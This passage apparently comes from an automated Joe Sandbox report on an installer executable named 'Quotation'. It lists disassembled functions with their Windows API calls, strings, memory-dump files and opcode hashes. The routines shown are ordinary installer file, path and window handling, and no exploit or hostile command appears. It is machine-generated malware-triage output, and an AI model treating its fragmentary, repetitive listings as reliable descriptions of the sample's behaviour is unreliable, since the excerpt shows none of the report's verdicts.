                                                                                                • Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                              • API String ID: 2900126502-461813615
                                                                                              • Opcode ID: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
                                                                                              • Instruction ID: 9f7f24d6a9d8affb6c81019e1e78af230b3462d5c5472edf7d8bbe76e1c752c2
                                                                                              • Opcode Fuzzy Hash: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
                                                                                              • Instruction Fuzzy Hash: 1B3128B16012117BD7206B358D49F7B3A5CEF81749B06453EF943FA2C2DA7D88628A7C
                                                                                              APIs
                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406D90
                                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
                                                                                              • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406DA4
                                                                                              • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406DBC
                                                                                              Strings
                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406D1B, 00406D1D
                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D22
                                                                                              • *?|<>/":, xrefs: 00406D7F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Prev
                                                                                              • String ID: *?|<>/":$C:\Users\user~1\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                                              • API String ID: 589700163-3572696228
                                                                                              • Opcode ID: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                                                                              • Instruction ID: 64caea1e5fba35c947d9094266ac5fc002638ab42ea644ca00d5fa91912821bd
                                                                                              • Opcode Fuzzy Hash: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                                                                              • Instruction Fuzzy Hash: 7511D511B0063156DB30672A8C4097772E8DF69761756443BFDC6E32C0F77D8D9192B9
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                                                                              • Instruction ID: 26ea8d1a65f0c358df8059d13c2b59527feb86654ff2728a298fdc5f00fd0ae6
                                                                                              • Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                                                                              • Instruction Fuzzy Hash: E221D675500B049FDB649F28DA4895BB7F4EF45711B108A3EE896A26A0DB38E814DF28
                                                                                              APIs
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73C621BF
                                                                                                • Part of subcall function 73C612E1: lstrcpynW.KERNEL32(00000000,?,73C6156A,?,73C611C4,-000000A0), ref: 73C612F1
                                                                                              • GlobalAlloc.KERNEL32(?), ref: 73C6212C
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73C6214C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                              • String ID: @H3w
                                                                                              • API String ID: 4216380887-4275297014
                                                                                              • Opcode ID: faca138b6dd632195904936c48133eb10d597ddf5baf8df0bbb0981af91ecd0a
                                                                                              • Instruction ID: 3db57ad844a413e8ca02d817bcb2cd5faa7345cf70fa2795cb451b9d27d25bfd
                                                                                              • Opcode Fuzzy Hash: faca138b6dd632195904936c48133eb10d597ddf5baf8df0bbb0981af91ecd0a
                                                                                              • Instruction Fuzzy Hash: 32413771409B59EFC301DF26C8C4BE977B8FB05341B55023EEA4DDE189D7719980CAA2
                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040364B
                                                                                              • MulDiv.KERNEL32(00120C50,?,00120C50), ref: 00403673
                                                                                              • wsprintfW.USER32 ref: 00403683
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00403693
                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A5
                                                                                              Strings
                                                                                              • verifying installer: %d%%, xrefs: 0040367D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: verifying installer: %d%%
                                                                                              • API String ID: 1451636040-82062127
                                                                                              • Opcode ID: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                                                                              • Instruction ID: 44471e5cb11ab05bb0c6ce4c76b363bdac3f6882ce80e8a3b6daee8e8afc751d
                                                                                              • Opcode Fuzzy Hash: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                                                                              • Instruction Fuzzy Hash: BE018F71540208BBDF20AF60DE45BAA3B28A700305F00803AF642B51E0DBB58554CF4C
                                                                                              APIs
                                                                                                • Part of subcall function 73C612F8: GlobalAlloc.KERNEL32(?,?,73C611C4,-000000A0), ref: 73C61302
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73C622F1
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73C62326
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Free$Alloc
                                                                                              • String ID:
                                                                                              • API String ID: 1780285237-0
                                                                                              • Opcode ID: 4edc33303f1f3640d949a55391712f3f8565c71906052763ffb944acc1617660
                                                                                              • Instruction ID: 4e27d6da988a955be6c087fa46d74215b53ce04f02f9a6f50ee8a283d2a44c7f
                                                                                              • Opcode Fuzzy Hash: 4edc33303f1f3640d949a55391712f3f8565c71906052763ffb944acc1617660
                                                                                              • Instruction Fuzzy Hash: 80312432204699EFE7169F57C8D8F2AB7B9FF85321B214528F507CE090C731A850DB62
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(?,?), ref: 73C6116B
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73C611AE
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73C611CD
                                                                                              • GlobalAlloc.KERNEL32(?,?), ref: 73C611E6
                                                                                              • GlobalFree.KERNEL32 ref: 73C6125C
                                                                                              • GlobalFree.KERNEL32(?), ref: 73C612A7
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73C612BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Free$Alloc
                                                                                              • String ID:
                                                                                              • API String ID: 1780285237-0
                                                                                              • Opcode ID: c5b9394fa874b483d534e075e1a2dcc7b818d613bddd37c09d6e151c6a8e0750
                                                                                              • Instruction ID: a75dcd74b72a43cf498022d47dd6570ce0a157c764960e3f384ca6f963006014
                                                                                              • Opcode Fuzzy Hash: c5b9394fa874b483d534e075e1a2dcc7b818d613bddd37c09d6e151c6a8e0750
                                                                                              • Instruction Fuzzy Hash: 68518DB6504701DFD710EFAAC8C0B2A77F8FF48616B214529EA8ADF290D635E900CB91
                                                                                              APIs
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,73C62B4C,00000000,00000808), ref: 73C61F8C
                                                                                              • GlobalAlloc.KERNEL32(?,00000000), ref: 73C61F97
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 73C61FAB
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 73C61FB6
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73C61FBF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                              • String ID:
                                                                                              • API String ID: 1148316912-0
                                                                                              • Opcode ID: a671310ce38b827072b5bc6220cc464e090aebea4e3f1f317b09f3d6cdb460fa
                                                                                              • Instruction ID: ca08e0d7e903c3f848090fae019ed20f34980056e297db305c7060575c9d3cf1
                                                                                              • Opcode Fuzzy Hash: a671310ce38b827072b5bc6220cc464e090aebea4e3f1f317b09f3d6cdb460fa
                                                                                              • Instruction Fuzzy Hash: E8F0C033108579FBC6116AE7DC0CE57BE6DEB8B6FAB260215F61DD91A0C562AC008771
                                                                                              APIs
                                                                                              • wsprintfW.USER32 ref: 73C61F51
                                                                                              • lstrcpyW.KERNEL32(?,error,00001018,73C61765,00000000,?), ref: 73C61F71
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcpywsprintf
                                                                                              • String ID: callback%d$error
                                                                                              • API String ID: 2408954437-1307476583
                                                                                              • Opcode ID: fdeff285c55296647047aad088657446add26b8f88cbdef0f83c0d92b67c6799
                                                                                              • Instruction ID: bdf2d6888155c7ff4249dcbdcd097a16e1f23fcfc1c0d7152b7bee570d600b8a
                                                                                              • Opcode Fuzzy Hash: fdeff285c55296647047aad088657446add26b8f88cbdef0f83c0d92b67c6799
                                                                                              • Instruction Fuzzy Hash: 32F08C35204530EFD305CB05D988FBA73A9EF89315F0A81A8FC4ADF242C770AC408B92
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403CA1,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 0040653A
                                                                                              • CharPrevW.USER32(?,00000000), ref: 00406545
                                                                                              • lstrcatW.KERNEL32(?,004082B0), ref: 00406557
                                                                                              Strings
                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406534
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                              • API String ID: 2659869361-2382934351
                                                                                              • Opcode ID: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                                                                              • Instruction ID: 997ea4b4438496dccce44eacbb2634370b3c3ae0899ac86cf6792f2d8b8f87b4
                                                                                              • Opcode Fuzzy Hash: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                                                                              • Instruction Fuzzy Hash: F7D05E31102924AFC2026B58AE08D9B77ACEF46341341406EFAC1B3160CB745D5287ED
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeGlobal$__alldvrm
                                                                                              • String ID:
                                                                                              • API String ID: 482422042-0
                                                                                              • Opcode ID: b065b8ef8c7c092957ad0f90cdd6ba98bf98682d900e84da8ac9c41deb886845
                                                                                              • Instruction ID: d8476042f3144cd94c4cd6fcd0888a8828219b763df43c3d342349508031ebe8
                                                                                              • Opcode Fuzzy Hash: b065b8ef8c7c092957ad0f90cdd6ba98bf98682d900e84da8ac9c41deb886845
                                                                                              • Instruction Fuzzy Hash: D651F572604345CFD3079E7689C477EB6FEABC8213B1A492DE147CB286E7B1C9808252
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000), ref: 00403378
                                                                                              • GetTickCount.KERNEL32 ref: 00403397
                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,0040362D,00000000), ref: 004033B6
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 004033C4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                              • String ID:
                                                                                              • API String ID: 2102729457-0
                                                                                              • Opcode ID: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
                                                                                              • Instruction ID: 5fb2c38a213eff1d2f515c73fe307429b33afba48c29838db2cc379488067e45
                                                                                              • Opcode Fuzzy Hash: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
                                                                                              • Instruction Fuzzy Hash: C9F0F870551700EBDB209F60EF8EB163AA8B740B02F505579F941B51F0DB788514CA5C
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 00405852
                                                                                                • Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 0040589E
                                                                                                • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                                • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$InitializeUninitialize
                                                                                              • String ID: Eget Setup: Installing
                                                                                              • API String ID: 1011633862-3699597151
                                                                                              • Opcode ID: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
                                                                                              • Instruction ID: 8d413f420cbd2cda170a8e13f5886ccfc68e5e1a5fc2061566676394b2cd1e54
                                                                                              • Opcode Fuzzy Hash: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
